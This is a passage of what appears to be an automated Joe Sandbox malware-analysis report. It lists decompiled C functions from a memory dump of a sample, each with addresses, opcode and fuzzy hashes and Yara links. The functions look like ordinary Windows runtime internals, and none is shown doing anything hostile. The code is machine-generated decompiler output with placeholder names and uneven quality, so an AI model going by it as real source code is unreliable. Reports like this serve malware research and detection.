				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb1d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00A6FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00A47D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                              0x00ae138a
                                                              0x00ae138a
                                                              0x00ae1399
                                                              0x00ae13a3
                                                              0x00ae13a8
                                                              0x00ae13aa
                                                              0x00ae13b5
                                                              0x00ae13bb
                                                              0x00ae13c3
                                                              0x00ae13c6
                                                              0x00ae13c9
                                                              0x00ae13d4
                                                              0x00ae13e6
                                                              0x00ae13d6
                                                              0x00ae13df
                                                              0x00ae13df
                                                              0x00ae13f1
                                                              0x00ae13f2
                                                              0x00ae13f4
                                                              0x00ae13f9
                                                              0x00ae140e

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd3d9ae4fc94b65f299b39bd807bab6a8513185049b7b01544061ae26e8f66f9
                                                              • Instruction ID: 573a65792173a5e5e62afe829d8ae4f347137182bec6c5f62044f256719a9b67
                                                              • Opcode Fuzzy Hash: dd3d9ae4fc94b65f299b39bd807bab6a8513185049b7b01544061ae26e8f66f9
                                                              • Instruction Fuzzy Hash: 35015E71A00358AFCB14DFA9D942EAEBBB8EF44710F504066B914EB281EA749A41CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A258EC Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 91%
                                                              			E00A258EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0xb1d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xa05c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00A25943() != 0 &&  *0xb15320 > 5) {
					E00AA7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E00AA7B5E( &_v28, _t28);
					_t11 = E00AA7B9C(0xb15320, 0xa0bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00A6B640(_t11, _t17, _v8 ^ _t29, 0xa0bf15, _t27, _t28);
			}















                                                              0x00a258fb
                                                              0x00a258fe
                                                              0x00a25906
                                                              0x00a2590a
                                                              0x00a2593c
                                                              0x00a2593c
                                                              0x00a2590c
                                                              0x00a2590c
                                                              0x00a25911
                                                              0x00000000
                                                              0x00a25913
                                                              0x00a25913
                                                              0x00a25913
                                                              0x00a25911
                                                              0x00a2591d
                                                              0x00a81035
                                                              0x00a8103c
                                                              0x00a8103f
                                                              0x00a81056
                                                              0x00a81056
                                                              0x00a2593b

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36d7683ef06cf431f7b20d7106b51e1a9cf40d682b3dfdc539a3bcc9f5185e74
                                                              • Instruction ID: b6a4dae8a6c971987ffc1206400853347a997b088d2e8bed0fcd4953d730391b
                                                              • Opcode Fuzzy Hash: 36d7683ef06cf431f7b20d7106b51e1a9cf40d682b3dfdc539a3bcc9f5185e74
                                                              • Instruction Fuzzy Hash: CA018F72E10918EBC714EB79ED019AFB7B9FB81360B944079A80697291DF30DD86C6A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3B02A Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A3B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00A47D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00AA7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                              0x00a3b037
                                                              0x00a3b039
                                                              0x00a3b03b
                                                              0x00a3b040
                                                              0x00a8a60e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8a61d
                                                              0x00a3b04b
                                                              0x00a3b04e
                                                              0x00a8a627
                                                              0x00a8a634
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8a641
                                                              0x00a8a653
                                                              0x00a8a643
                                                              0x00a8a64c
                                                              0x00a8a64c
                                                              0x00a8a65b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8a66c
                                                              0x00a3b057
                                                              0x00a3b057
                                                              0x00a3b057
                                                              0x00a3b046
                                                              0x00a3b046
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction ID: da48a89be9010defdc7eda2e11f8160fdf017e40412f90cfce6793474a50fcdf
                                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction Fuzzy Hash: CA018F322149809FE326D71DC988F6B77E9EB96750F0900B2FA19CBA91E728DC40C721
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF1074 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00AF1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E00AF165E(__ebx, 0xb18ae4, (__edx -  *0xb18b04 >> 0x14) + (__edx -  *0xb18b04 >> 0x14), __edi, __ecx, (__edx -  *0xb18b04 >> 0x14) + (__edx -  *0xb18b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E00AEAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00A47D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E00ADFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                              0x00af1074
                                                              0x00af1080
                                                              0x00af1082
                                                              0x00af108a
                                                              0x00af108f
                                                              0x00af1093
                                                              0x00af10ab
                                                              0x00af10ab
                                                              0x00af10c3
                                                              0x00af10cf
                                                              0x00af10e1
                                                              0x00af10d1
                                                              0x00af10da
                                                              0x00af10da
                                                              0x00af10e9
                                                              0x00af10f5
                                                              0x00af10f5
                                                              0x00af10fe

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ea78900a8125f53c63344dfa8c48446c857d047acf7dd25b217da32c7d68045
                                                              • Instruction ID: 60287bca76de817a708a088c180d4516c5d0b5e2bdca3ccdf8c8ab2178132e37
                                                              • Opcode Fuzzy Hash: 3ea78900a8125f53c63344dfa8c48446c857d047acf7dd25b217da32c7d68045
                                                              • Instruction Fuzzy Hash: AE012472504785DFC710EFA8CA41B2AB7E5AB84310F048A29F98683291EE31D880CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADFEC0 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00ADFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb1d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00A6FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00A47D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                              0x00adfec0
                                                              0x00adfec0
                                                              0x00adfecf
                                                              0x00adfed9
                                                              0x00adfede
                                                              0x00adfee0
                                                              0x00adfeeb
                                                              0x00adfef3
                                                              0x00adfef6
                                                              0x00adfef9
                                                              0x00adff04
                                                              0x00adff16
                                                              0x00adff06
                                                              0x00adff0f
                                                              0x00adff0f
                                                              0x00adff21
                                                              0x00adff22
                                                              0x00adff24
                                                              0x00adff29
                                                              0x00adff3e

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f53b8ad7e0f38c52a1d0009db9bd6436f33771e21c70a58733c39f8886a328a
                                                              • Instruction ID: 6df20d88ee4bb196dbf747855a5377fb5a0cecd3c73778966429f847b74eb468
                                                              • Opcode Fuzzy Hash: 6f53b8ad7e0f38c52a1d0009db9bd6436f33771e21c70a58733c39f8886a328a
                                                              • Instruction Fuzzy Hash: 57018471E00218AFCB14DFA9D946FAFB7B8EF44700F404066B905EB391EA709A01C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADFE3F Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00ADFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb1d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00A6FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00A47D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                              0x00adfe3f
                                                              0x00adfe3f
                                                              0x00adfe4e
                                                              0x00adfe58
                                                              0x00adfe5d
                                                              0x00adfe5f
                                                              0x00adfe6a
                                                              0x00adfe72
                                                              0x00adfe75
                                                              0x00adfe78
                                                              0x00adfe83
                                                              0x00adfe95
                                                              0x00adfe85
                                                              0x00adfe8e
                                                              0x00adfe8e
                                                              0x00adfea0
                                                              0x00adfea1
                                                              0x00adfea3
                                                              0x00adfea8
                                                              0x00adfebd

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c1e7d1204baba5b69c7a1528472b0022c255357de50baa2e97e1bf4bda33335
                                                              • Instruction ID: f680adf957ac02680add7a3125dca388f8aa6e646366e0025d72f5ec87c8db96
                                                              • Opcode Fuzzy Hash: 2c1e7d1204baba5b69c7a1528472b0022c255357de50baa2e97e1bf4bda33335
                                                              • Instruction Fuzzy Hash: 1F018F71E00258AFCB14DFA9D846FAFBBB8EF44700F004066B901EB391DE709A01CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8ED6 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00AF8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0xb1d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00A47D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                              0x00af8ed6
                                                              0x00af8ee5
                                                              0x00af8eed
                                                              0x00af8ef0
                                                              0x00af8efa
                                                              0x00af8f03
                                                              0x00af8f0c
                                                              0x00af8f15
                                                              0x00af8f24
                                                              0x00af8f27
                                                              0x00af8f31
                                                              0x00af8f43
                                                              0x00af8f33
                                                              0x00af8f3c
                                                              0x00af8f3c
                                                              0x00af8f4e
                                                              0x00af8f4f
                                                              0x00af8f51
                                                              0x00af8f56
                                                              0x00af8f69

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37fffa0930874bbeac28fdad27545f51c8351f202fe8ae3b49a2273ac91ab081
                                                              • Instruction ID: 267acf9f6cee396bb93c3a8f1c11e4fe11de26477ad862591fbe620e85c5d4c7
                                                              • Opcode Fuzzy Hash: 37fffa0930874bbeac28fdad27545f51c8351f202fe8ae3b49a2273ac91ab081
                                                              • Instruction Fuzzy Hash: A9110C70A102599FDB04DFA8D541AAEB7F4BF08700F1482AAE518EB382EA349940CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8A62 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00AF8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0xb1d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00A47D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A6B640(E00A69AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                              0x00af8a62
                                                              0x00af8a71
                                                              0x00af8a79
                                                              0x00af8a82
                                                              0x00af8a85
                                                              0x00af8a89
                                                              0x00af8a8c
                                                              0x00af8a8f
                                                              0x00af8a92
                                                              0x00af8a95
                                                              0x00af8a9f
                                                              0x00af8ab1
                                                              0x00af8aa1
                                                              0x00af8aaa
                                                              0x00af8aaa
                                                              0x00af8abc
                                                              0x00af8abd
                                                              0x00af8abf
                                                              0x00af8ac4
                                                              0x00af8ada

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00ca4db00c57f08b63c0cbbc8411e87059cecabf5972a8e173b442e5694878d3
                                                              • Instruction ID: 5f2ecb5cb9c0d99dab7a0a2b2348573ebccddcdb11b46141a565f3906e0c144c
                                                              • Opcode Fuzzy Hash: 00ca4db00c57f08b63c0cbbc8411e87059cecabf5972a8e173b442e5694878d3
                                                              • Instruction Fuzzy Hash: 4C012C75A0021CAFCB00DFA9D9419EEB7B8EF48350F50405AFA04E7351EB34AA01CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2DB60 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A2DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00A2DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00A2E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00A2E8B0(__ecx, _t14, 0xfff);
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                              0x00a2db64
                                                              0x00a2db66
                                                              0x00a2db6b
                                                              0x00a2dbaa
                                                              0x00a2db71
                                                              0x00a2db76
                                                              0x00a2db7a
                                                              0x00a2dba3
                                                              0x00a2db7c
                                                              0x00a2db87
                                                              0x00a2db8b
                                                              0x00a84fa1
                                                              0x00a84fb3
                                                              0x00a84fb8
                                                              0x00a2db91
                                                              0x00a2db96
                                                              0x00a2db98
                                                              0x00a2db98
                                                              0x00a2db8b
                                                              0x00a2db7a
                                                              0x00a2db9d
                                                              0x00a2dba2

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction ID: cf6790d54f86f89f90ec5b6b56af81ec9393e2cd5e32b67c9013cc614bc9dcb6
                                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction Fuzzy Hash: BAF0FC332055329BD3326B5D99A0F5BB6A59FC2B60F270035F2059B346CA608C0297D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2B1E1 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A2B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00A47D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00A47D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00AA7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                              0x00a2b1e8
                                                              0x00a2b1ea
                                                              0x00a2b1f3
                                                              0x00a84a17
                                                              0x00a2b1f9
                                                              0x00a2b1f9
                                                              0x00a2b1f9
                                                              0x00a2b201
                                                              0x00a84a21
                                                              0x00a84a2e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a84a3b
                                                              0x00a84a4d
                                                              0x00a84a3d
                                                              0x00a84a46
                                                              0x00a84a46
                                                              0x00a84a55
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a2b20a
                                                              0x00a2b20a
                                                              0x00a2b20a
                                                              0x00a2b20a

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction ID: 38b9a12a7ec58afb37411684d9b1f7cc7a8019954dc652c583b87fdd72cfec91
                                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction Fuzzy Hash: E301F432654690DFD326A75DD904FAABBA8EF95790F0904B1F9148B6B2E778CC00C724
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABFE87 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 46%
                                                              			E00ABFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0xb1d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00A47D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                              0x00abfe96
                                                              0x00abfe9e
                                                              0x00abfea1
                                                              0x00abfead
                                                              0x00abfeb3
                                                              0x00abfeb9
                                                              0x00abfec3
                                                              0x00abfed5
                                                              0x00abfec5
                                                              0x00abfece
                                                              0x00abfece
                                                              0x00abfee0
                                                              0x00abfee1
                                                              0x00abfee3
                                                              0x00abfee8
                                                              0x00abfefb

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38a15fac8812ac030a5b3da187e180650aac2572b848d5cae3ec8db64c892cc6
                                                              • Instruction ID: 9d544dbab8f45bae3caff73741924e9c2b5e7f7c8fcb6fc82e15e0f751c122b0
                                                              • Opcode Fuzzy Hash: 38a15fac8812ac030a5b3da187e180650aac2572b848d5cae3ec8db64c892cc6
                                                              • Instruction Fuzzy Hash: 56016274A00208AFCB14DFA8D942AAEB7F4EF04700F144169B514DB393DA35DA01CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AE131B Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 48%
                                                              			E00AE131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb1d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00A47D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00A6B640(E00A69AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                              0x00ae131b
                                                              0x00ae132a
                                                              0x00ae1330
                                                              0x00ae1336
                                                              0x00ae133e
                                                              0x00ae1341
                                                              0x00ae1344
                                                              0x00ae134f
                                                              0x00ae1361
                                                              0x00ae1351
                                                              0x00ae135a
                                                              0x00ae135a
                                                              0x00ae136c
                                                              0x00ae136d
                                                              0x00ae136f
                                                              0x00ae1374
                                                              0x00ae1387

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea358c2fe2ec58d2a3f49e4aaa6dc2168258a6bd45a0129ad902eae9a852fc61
                                                              • Instruction ID: f980d253a6a9e032b3fd04fb347991cefc92e6671e9688705d2288757cf2f619
                                                              • Opcode Fuzzy Hash: ea358c2fe2ec58d2a3f49e4aaa6dc2168258a6bd45a0129ad902eae9a852fc61
                                                              • Instruction Fuzzy Hash: 38013C75A01258AFCB44EFA9D646AAEB7F4FF48700F508059B815EB392EA349A00CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF8F6A Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 48%
